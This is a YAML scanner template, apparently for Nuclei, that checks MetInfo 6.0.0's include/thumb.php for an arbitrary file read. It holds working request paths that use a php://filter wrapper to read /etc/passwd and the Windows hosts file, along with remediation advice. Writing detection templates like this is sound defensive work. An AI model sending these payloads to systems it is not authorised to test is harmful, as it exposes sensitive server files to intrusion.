id: Metinfo-V6_0_0_thumb_php-FileRead
info:
  name: metinfo 6.0.0 thumb.php arbitrary file read.
  author:
  - l0ne1y
  description: |-
    metinfo 6.0.0 thumb.php arbitrary file read.

    MetInfo is an open-source, free CMS building system suitable for enterprise websites. The MetInfo enterprise website management system is mainly used to build enterprise websites and uses a PHP+Mysql architecture.

    The metinfo 6.0.0 thumb.php page has an arbitrary file read vulnerability. An attacker can exploit it to obtain sensitive information.
  severity: high
  remediation: |-
    Remediation

    Official Fix:<br />1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site.
    https://www.mituo.cn/

    Temporary Fix:<br />1. Filter ".", preventing users from traversing to parent directories in the URL.<br />2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.<br />3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.<br />4. Store file paths in the database and let users download files by submitting the corresponding file ID.<br />5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: dsl
    condition: or
    dsl:
    - status_code_1==200 && contains(body_1,"root:x:")
    - status_code_2==200 && contains(body_2,"sample HOSTS file")
  matchers-condition: and
  path:
  - '{{BaseURL}}/include/thumb.php?dir=php://filter/read=http/resource=/etc/passwd'
  - '{{BaseURL}}/include/thumb.php?dir=php://filter/read=http/resource=c:/windows/system32/drivers/etc/hosts'
  method: GET
